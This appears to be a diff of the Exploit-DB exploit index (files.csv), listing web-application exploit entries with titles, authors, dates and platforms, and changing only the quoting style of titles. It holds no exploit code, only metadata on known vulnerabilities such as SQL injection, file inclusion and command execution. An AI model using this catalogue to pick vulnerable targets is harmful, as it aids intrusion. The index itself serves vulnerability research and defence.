22152,platforms/php/webapps/22152.txt,"Joomla! Component com_commedia - 'task' SQL Injection",2012-10-22,D4NB4R,php,webapps,0 22153,platforms/php/webapps/22153.pl,"Joomla! Component com_kunena - 'search' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 @@ -26794,7 +26795,7 @@ id,file,description,date,author,platform,type,port 22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 -22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 +22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - 'profiles.php' Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 - 'users.php?uid' Cross-Site Scripting",2003-01-14,snooq,php,webapps,0 22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 - 'comment.php?cid' Cross-Site Scripting",2003-01-14,snooq,php,webapps,0 22166,platforms/php/webapps/22166.txt,"Geeklog 1.3.7 - 'Homepage User' HTML Injection",2003-01-14,snooq,php,webapps,0 @@ -26806,9 +26807,9 @@ id,file,description,date,author,platform,type,port 22176,platforms/php/webapps/22176.txt,"PHP TopSites 2.0/2.2 - 'help.php' Cross-Site Scripting",2003-01-15,"Cyberarmy Application",php,webapps,0 22177,platforms/php/webapps/22177.txt,"PHP TopSites 2.0/2.2 - 'edit.php' SQL Injection",2003-01-15,"Cyberarmy Application",php,webapps,0 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 -22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 +22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - 'privmsg.php' SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 -22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD - save_item.php Arbitrary File Upload",2003-01-20,frog,php,webapps,0 +22186,platforms/php/webapps/22186.txt,"MyRoom 3.5 GOLD - 'save_item.php' Arbitrary File Upload",2003-01-20,frog,php,webapps,0 22279,platforms/php/webapps/22279.txt,"GONiCUS System Administrator 1.0 - Remote File Inclusion",2003-02-24,"Karol Wiesek",php,webapps,0 22192,platforms/php/webapps/22192.pl,"YABB SE 0.8/1.4/1.5 - 'Packages.php' Remote File Inclusion",2003-01-22,spabam,php,webapps,0 22195,platforms/php/webapps/22195.txt,"PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution",2003-01-22,MGhz,php,webapps,0 @@ -26827,10 +26828,10 @@ id,file,description,date,author,platform,type,port 22241,platforms/php/webapps/22241.txt,"Cedric Email Reader 0.2/0.3 - Skin Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 22242,platforms/php/webapps/22242.txt,"Cedric Email Reader 0.4 - Global Configuration Script Remote File Inclusion",2003-02-09,MGhz,php,webapps,0 22252,platforms/php/webapps/22252.txt,"PHP-Board 1.0 - User Password Disclosure",2003-02-15,frog,php,webapps,0 -22253,platforms/php/webapps/22253.txt,"DotBr 0.1 - System.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 -22254,platforms/php/webapps/22254.txt,"DotBr 0.1 - Exec.php3 Remote Command Execution",2003-02-15,frog,php,webapps,0 -22256,platforms/php/webapps/22256.txt,"D-Forum 1 - header Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 -22257,platforms/php/webapps/22257.txt,"D-Forum 1 - footer Parameter Remote File Inclusion",2003-02-18,frog,php,webapps,0 +22253,platforms/php/webapps/22253.txt,"DotBr 0.1 - 'System.php3' Remote Command Execution",2003-02-15,frog,php,webapps,0 +22254,platforms/php/webapps/22254.txt,"DotBr 0.1 - 'Exec.php3' Remote Command Execution",2003-02-15,frog,php,webapps,0 +22256,platforms/php/webapps/22256.txt,"D-Forum 1 - 'header' Remote File Inclusion",2003-02-18,frog,php,webapps,0 +22257,platforms/php/webapps/22257.txt,"D-Forum 1 - 'footer' Remote File Inclusion",2003-02-18,frog,php,webapps,0 22260,platforms/cgi/webapps/22260.c,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (1)",2003-02-19,bob,cgi,webapps,0 22261,platforms/cgi/webapps/22261.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (2)",2003-02-19,CaMaLeoN,cgi,webapps,0 22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (3)",2003-02-19,SPAX,cgi,webapps,0 @@ -26856,8 +26857,8 @@ id,file,description,date,author,platform,type,port 22318,platforms/php/webapps/22318.txt,"Webchat 0.77 - 'Defines.php' Remote File Inclusion",2003-03-03,frog,php,webapps,0 22336,platforms/php/webapps/22336.txt,"PHPPing 0.1 - Remote Command Execution",2003-03-06,"gregory Le Bras",php,webapps,0 22337,platforms/cgi/webapps/22337.txt,"Wordit Logbook 098b3 - Logbook.pl Remote Command Execution",2003-03-07,"Aleksey Sintsov",cgi,webapps,0 -22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 - users.php Insecure File Permissions",2003-03-07,flur,php,webapps,0 -22343,platforms/php/webapps/22343.txt,"VPOPMail 0.9x - vpopmail.php Remote Command Execution",2003-03-11,ERRor,php,webapps,0 +22339,platforms/php/webapps/22339.txt,"SimpleBBS 1.0.6 - 'users.php' Insecure File Permissions",2003-03-07,flur,php,webapps,0 +22343,platforms/php/webapps/22343.txt,"VPOPMail 0.9x - 'vpopmail.php' Remote Command Execution",2003-03-11,ERRor,php,webapps,0 22347,platforms/php/webapps/22347.txt,"PHP-Nuke 5.5/6.0 AvantGo Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0 22348,platforms/php/webapps/22348.txt,"PHP-Nuke 5.5/6.0 News Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0 22349,platforms/php/webapps/22349.txt,"PHP-Nuke Splatt Forum 3.2 Module - Full Path Disclosure",2003-03-12,"Rynho Zeros Web",php,webapps,0 @@ -26877,14 +26878,14 @@ id,file,description,date,author,platform,type,port 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0 22391,platforms/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22392,platforms/php/webapps/22392.txt,"osCommerce 2.1/2.2 - Info_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 -22393,platforms/php/webapps/22393.txt,"osCommerce 2.1/2.2 - Checkout_Payment.php Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 +22393,platforms/php/webapps/22393.txt,"osCommerce 2.1/2.2 - 'Checkout_Payment.php' Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22396,platforms/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22398,platforms/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-11-01,"CYBSEC Labs",php,webapps,0 22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22408,platforms/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0 -22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0 +22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - 'banners.php' Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0 22412,platforms/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,php,webapps,0 40412,platforms/php/webapps/40412.txt,"Exponent CMS 2.3.9 - Blind SQL Injection",2016-09-22,"Manuel García Cárdenas",php,webapps,80 22413,platforms/php/webapps/22413.txt,"PHP-Nuke 5.6/6.x News Module - 'article.php' SQL Injection",2003-03-22,frog,php,webapps,0 @@ -26898,7 +26899,7 @@ id,file,description,date,author,platform,type,port 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 - Persistent Cross-Site Scripting",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps,0 -22436,platforms/asp/webapps/22436.txt,"MyGuestBK - Add.asp Cross-Site Scripting",2002-03-27,Over_G,asp,webapps,0 +22436,platforms/asp/webapps/22436.txt,"MyGuestBK - 'Add.asp' Cross-Site Scripting",2002-03-27,Over_G,asp,webapps,0 22437,platforms/asp/webapps/22437.txt,"MyGuestBK - Unauthorized Admin Panel Access",2002-03-27,Over_G,asp,webapps,0 22438,platforms/php/webapps/22438.txt,"PostNuke 0.72x Stats Module - Full Path Disclosure",2003-03-28,rkc,php,webapps,0 22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Full Path Disclosure",2003-03-28,rkc,php,webapps,0 @@ -26917,11 +26918,11 @@ id,file,description,date,author,platform,type,port 22481,platforms/cgi/webapps/22481.txt,"Super Guestbook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,cgi,webapps,0 22482,platforms/cgi/webapps/22482.txt,"Guestbook 4.0 - Sensitive Information Disclosure",2003-04-10,Over_G,cgi,webapps,0 22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 -22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 - index.cfm SQL Injection",2003-04-14,"Jim Dew",cfm,webapps,0 +22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 - 'index.cfm' SQL Injection",2003-04-14,"Jim Dew",cfm,webapps,0 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 - Information Disclosure",2003-04-14,drG4njubas,asp,webapps,0 22490,platforms/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 -22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 - script.php Remote Command Execution",2003-03-31,"DWC Gr0up",php,webapps,0 +22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 - 'script.php' Remote Command Execution",2003-03-31,"DWC Gr0up",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Full Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall - Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0 22498,platforms/php/webapps/22498.txt,"osCommerce 2.2 - Authentication Bypass",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -26943,8 +26944,8 @@ id,file,description,date,author,platform,type,port 22547,platforms/php/webapps/22547.php,"Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 22548,platforms/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server - Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 -22554,platforms/asp/webapps/22554.txt,"Microsoft BizTalk Server 2000/2002 DTA - rawdocdata.asp SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 -22555,platforms/asp/webapps/22555.txt,"Microsoft BizTalk Server 2000/2002 DTA - RawCustomSearchField.asp SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 +22554,platforms/asp/webapps/22554.txt,"Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 +22555,platforms/asp/webapps/22555.txt,"Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps,0 22557,platforms/php/webapps/22557.txt,"PHP-Nuke Splatt Forum 4.0 Module - Cross-Site Scripting",2003-05-01,"Morning Wood",php,webapps,0 22558,platforms/php/webapps/22558.txt,"PHP-Nuke Splatt Forum 4.0 Module - HTML Injection",2003-05-01,"Morning Wood",php,webapps,0 22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 @@ -26952,7 +26953,7 @@ id,file,description,date,author,platform,type,port 22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22579,platforms/php/webapps/22579.txt,"Phorum 3.4.x - 'Message Form' HTML Injection",2003-05-09,WiciU,php,webapps,0 -22583,platforms/asp/webapps/22583.pl,"Snitz Forums 2000 - register.asp SQL Injection",2003-05-10,sharpiemarker,asp,webapps,0 +22583,platforms/asp/webapps/22583.pl,"Snitz Forums 2000 - 'register.asp' SQL Injection",2003-05-10,sharpiemarker,asp,webapps,0 22588,platforms/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps,0 22589,platforms/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps,0 22590,platforms/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 @@ -26962,7 +26963,7 @@ id,file,description,date,author,platform,type,port 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0 -22603,platforms/php/webapps/22603.txt,"PHP-Proxima - autohtml.php Information Disclosure",2003-05-14,"Mind Warper",php,webapps,0 +22603,platforms/php/webapps/22603.txt,"PHP-Proxima - 'autohtml.php' Information Disclosure",2003-05-14,"Mind Warper",php,webapps,0 22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,php,webapps,0 22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,php,webapps,0 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0 @@ -26972,15 +26973,15 @@ id,file,description,date,author,platform,type,port 22632,platforms/php/webapps/22632.txt,"XMB Forum 1.8 - 'member.php' Cross-Site Scripting",2003-06-22,"Marc Ruef",php,webapps,0 22639,platforms/asp/webapps/22639.txt,"IISProtect 2.1/2.2 - Web Administration Interface SQL Injection",2003-05-23,Gyrniff,asp,webapps,0 22641,platforms/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Inclusion",2003-05-24,Over_G,php,webapps,0 -22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 - admin_iplog.php Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps,0 +22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 - 'admin_iplog.php' Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps,0 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module - SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22654,platforms/php/webapps/22654.txt,"Bananadance Wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 22656,platforms/php/webapps/22656.py,"vBulletin vBay 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 22663,platforms/php/webapps/22663.txt,"Newsscript 1.0 - Administrative Privilege Escalation",2003-05-27,"Peter Winter-Smith",php,webapps,0 22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting",2003-05-28,"silent needel",cgi,webapps,0 -22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 - URI Parameter File Disclosure",2003-05-29,pokleyzz,php,webapps,0 +22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 - 'URI' File Disclosure",2003-05-29,pokleyzz,php,webapps,0 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0 -22673,platforms/asp/webapps/22673.txt,"philboard 1.14 - philboard_admin.asp Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0 +22673,platforms/asp/webapps/22673.txt,"philboard 1.14 - 'philboard_admin.asp' Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 @@ -26999,12 +27000,12 @@ id,file,description,date,author,platform,type,port 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection / Authentication Bypass",2012-11-14,d3b4g,php,webapps,0 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 -22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - users.php Database 'Username' Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - 'users.php?Database 'Username' Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 22716,platforms/php/webapps/22716.txt,"WebChat 2.0 - 'users.php' Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module - Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps,0 22724,platforms/asp/webapps/22724.txt,"Xpressions Interactive - Multiple SQL Injections",2003-06-04,"Paul Craig",asp,webapps,0 22725,platforms/php/webapps/22725.txt,"PHP 4 - 'PHPInfo()' Cross-Site Scripting",2002-10-12,"Matthew Murphy",php,webapps,0 -22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.asp Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0 +22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - 'Browse.asp' Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0 22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0 22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0 22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0 @@ -27020,22 +27021,22 @@ id,file,description,date,author,platform,type,port 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22829,platforms/php/webapps/22829.txt,"weBid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 -22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - user.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 +22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - 'user.php' UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php?question' SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - '/Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 -22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - search.asp Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0 -22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 -22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 +22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - 'search.asp' Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0 +22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - 'move_messages.php' Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 +22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 Administrator Plugin - 'options.php' Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Exploit",2003-06-17,dr_insane,php,webapps,0 22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22805,platforms/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 - URL.jsp Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps,0 22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x - '/lib/' Multiple Script Direct Request Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script 'sfx' Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x - Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22812,platforms/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps,0 22818,platforms/php/webapps/22818.txt,"Tutos 1.1 - 'File_Select.php' Cross-Site Scripting",2003-06-20,"François SORIN",php,webapps,0 @@ -27052,9 +27053,9 @@ id,file,description,date,author,platform,type,port 22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 22853,platforms/php/webapps/22853.txt,"WordPress Plugin Facebook Survey 1.0 - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 22857,platforms/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script - Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps,0 -22864,platforms/asp/webapps/22864.txt,"ProductCart 1.5/1.6/2.0 - Custva.asp SQL Injection",2003-07-04,Bosen,asp,webapps,0 +22864,platforms/asp/webapps/22864.txt,"ProductCart 1.5/1.6/2.0 - 'Custva.asp' SQL Injection",2003-07-04,Bosen,asp,webapps,0 22865,platforms/asp/webapps/22865.txt,"ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection",2003-07-04,Bosen,asp,webapps,0 -22866,platforms/asp/webapps/22866.txt,"ProductCart 1.5/1.6/2.0 - MSG.asp Cross-Site Scripting",2003-07-05,atomix,asp,webapps,0 +22866,platforms/asp/webapps/22866.txt,"ProductCart 1.5/1.6/2.0 - 'MSG.asp' Cross-Site Scripting",2003-07-05,atomix,asp,webapps,0 22868,platforms/asp/webapps/22868.txt,"ProductCart 1.5/1.6/2.0 - File Disclosure",2003-07-05,"Tri Huynh",asp,webapps,0 22874,platforms/php/webapps/22874.txt,"CPanel 5.0/5.3/6.x - Admin Interface HTML Injection",2003-07-07,"Ory Segal",php,webapps,0 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,php,webapps,0 @@ -27077,14 +27078,14 @@ id,file,description,date,author,platform,type,port 22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 - WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",php,webapps,0 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps,0 22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution",2003-07-24,"Martin Eiszner",php,webapps,0 -22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 - db.php Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0 +22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 - 'db.php' Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0 22963,platforms/cgi/webapps/22963.txt,"Softshoe - Parse-file Cross-Site Scripting",2003-07-28,"Bahaa Naamneh",cgi,webapps,0 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",php,webapps,0 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal",2003-07-21,gr00vy,php,webapps,0 22921,platforms/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,asp,webapps,0 22922,platforms/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps,0 -22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - Settings.inc.php Full Path Disclosure",2003-07-17,Bosen,php,webapps,0 +22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - 'Settings.inc.php' Full Path Disclosure",2003-07-17,Bosen,php,webapps,0 22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Remote File Inclusion",2003-07-18,PUPET,php,webapps,0 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 @@ -27095,16 +27096,16 @@ 